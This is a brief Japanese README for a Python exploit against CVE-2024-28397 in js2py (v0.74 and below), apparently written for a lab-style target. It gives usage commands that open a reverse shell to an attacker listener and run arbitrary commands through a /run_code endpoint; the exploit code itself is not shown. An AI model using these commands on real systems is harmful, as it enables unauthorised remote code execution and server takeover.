
CVE-2024-28397 を標的とした js2py <= v0.74 向けの Python エクスプロイトスクリプト。リバースシェルおよび HTTP エンドポイントを介したカスタムコマンド実行に対応。
デフォルトのリバースシェルペイロードとオプションのコマンド引数が許可されています
エクスプロイトは js2py <= v0.74 で動作します
requests ライブラリ (pip install requests)リバースシェル:
python exploit.py 10.129.227.108 /run_code --local_ip 10.10.14.71 --local_port 4444
カスタムコマンド:
python exploit.py 10.129.227.108 /run_code --cmd "id"